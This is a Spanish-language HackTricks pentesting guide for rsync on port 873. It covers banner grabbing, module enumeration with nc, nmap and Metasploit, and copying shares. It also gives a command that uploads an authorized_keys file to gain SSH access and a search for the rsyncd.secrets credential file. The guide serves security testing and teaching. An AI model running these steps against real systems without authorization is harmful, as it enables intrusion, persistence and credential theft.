# 873 - Pentesting Rsync
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 馃挰 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Informaci贸n B谩sica**
De [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync** es una utilidad para transferir y sincronizar eficientemente [archivos](https://en.wikipedia.org/wiki/Computer\_file) entre una computadora y un disco duro externo y a trav茅s de [computadoras](https://en.wikipedia.org/wiki/Computer) [en red](https://en.wikipedia.org/wiki/Computer\_network) comparando los [tiempos de modificaci贸n](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) y tama帽os de los archivos.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Se encuentra com煤nmente en sistemas operativos [tipo Unix](https://en.wikipedia.org/wiki/Unix-like). El algoritmo rsync es un tipo de [codificaci贸n delta](https://en.wikipedia.org/wiki/Delta\_encoding), y se utiliza para minimizar el uso de la red. [Zlib](https://en.wikipedia.org/wiki/Zlib) puede ser utilizado para [compresi贸n de datos](https://en.wikipedia.org/wiki/Data\_compression) adicional,[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) y [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) o [stunnel](https://en.wikipedia.org/wiki/Stunnel) pueden ser utilizados para seguridad.
**Puerto por defecto:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
## Enumeraci贸n
### Banner y comunicaci贸n manual
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **Enumerando Carpetas Compartidas**
**Los m贸dulos Rsync** se reconocen como **comparticiones de directorios** que pueden estar **protegidas con contrase帽as**. Para identificar los m贸dulos disponibles y verificar si requieren contrase帽as, se utilizan los siguientes comandos:
```bash
nmap -sV --script "rsync-list-modules" -p
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Tenga en cuenta que algunas comparticiones pueden no aparecer en la lista, posiblemente ocult谩ndolas. Adem谩s, el acceso a algunas comparticiones puede estar restringido a **credenciales** espec铆ficas, indicado por un mensaje de **"Acceso Denegado"**.
### [**Fuerza Bruta**](../generic-methodologies-and-resources/brute-force.md#rsync)
### Uso Manual de Rsync
Al obtener una **lista de m贸dulos**, las acciones dependen de si se necesita autenticaci贸n. Sin autenticaci贸n, **listar** y **copiar** archivos de una carpeta compartida a un directorio local se logra a trav茅s de:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
Este proceso **transfiere archivos recursivamente**, preservando sus atributos y permisos.
Con **credenciales**, listar y descargar de una carpeta compartida se puede hacer de la siguiente manera, donde aparecer谩 un aviso de contrase帽a:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
Para **subir contenido**, como un archivo _**authorized_keys**_ para acceso, usa:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST
Para localizar el archivo de configuraci贸n de rsyncd, ejecuta:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
Dentro de este archivo, un par谩metro de _secrets file_ podr铆a apuntar a un archivo que contiene **nombres de usuario y contrase帽as** para la autenticaci贸n de rsyncd.
## Referencias
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 馃挰 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}